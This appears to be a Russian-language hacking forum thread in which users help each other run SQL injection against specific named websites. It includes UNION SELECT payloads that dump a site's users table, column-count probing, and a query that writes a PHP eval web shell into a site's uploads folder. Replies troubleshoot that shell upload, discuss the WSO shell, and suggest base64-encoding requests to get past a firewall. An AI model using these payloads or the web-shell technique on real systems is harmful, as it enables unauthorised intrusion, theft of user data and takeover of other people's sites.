Да нет они там есть. я знаю точно. сейчас обосную. При запросе только по id без других параметров выводиться данные в таком порядке 0,6,9,19,20,22.... пример --ttp://goldsauna.ru/articles.html?id=-7%27+union+select+1,2,%28group_concat%28id%29%29,4,5+from+goldsauna.users+ORDER+BY+id+ASC+--+ а при двойном запросе с добавлением name например, выводиться уже с позиции 166
а чем вас не устраивает limit? и с подобными вопросами наверное лудше было бы запостить в разделе по БД а не уязвимостей. _/thread62769.html
пытаюсь править индекс, вставляю код, нажимаю save сайт выдает что делать? есть ли шеллы использующие метод ГЕТ?
Не поможет. Это обычный firewall так реагирует на левые данные в REQUEST запросах. Закодируй в base64 контент пост-запроса и запиши в файл уже раскодированный.
Так же часто промежуточный сервер блокирует такие данные, в том числе и с большим объёмом. А вообще WSO постоянно использует POST(Шелл не работал бы вообще), а у GET длина ограничена(Не получиться передать нужный объём).
В чем ошибка ? Code: select '<?php eval($_REQUEST[cmd]); ?>' from mysql.user into outfile '/var/www/uprgroup/data/www/upr-group.ru/images/uploads2/test.php'
через запрос в скуле? или через пыху заливаешь? файл_прив есть положительное? папка доступна для записи?
Может в том, что пыху не понятно, что такое cmd? $_REQUEST[cmd] - обращение к массиву по глобальной переменной или хз ещё чему, которой не существует. Кавычки в общем надо. from mysql.user - нужно убрать вообще
Code: Description: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 0, 100' at line 1 Query: select 'test' from mysql.user into outfile '/var/data/www/site/images/test.php' LIMIT 0, 100
http://www.pmrs.ps/last/etemplate.php?id=-249+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20+ вот так вот и надо...как обычную
Глупости, отработает и так Не всегда, только если mysql не старый. wkar у тебя файл не создаётся, варианта три: 1 Нет прав на запись 2 Нет прав на операции с файлами (файлприва тоесть) 3 Путь не верный -------- upd Этого не заметил А откуда лимит-то? Менеджер добавляет наверное? Так срежь его )
Разьясните пожалуста что здесь не так? Code: -ttp://www.site.xx/mesto.php?id=1+GROUP+BY+92+--+ все ок 92 далее ставлю -ttp://www.site.xx/mesto.php?id=1851+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92+--+ ответ The used SELECT statements have a different number of columns и ошибка... union+select получается не работает?
ты когда +GROUP+BY+92+--+ ставишь, что тебя что открывается? если сам сайт, то пропробуй +GROUP+BY+95+--+ там полей может быть больше 92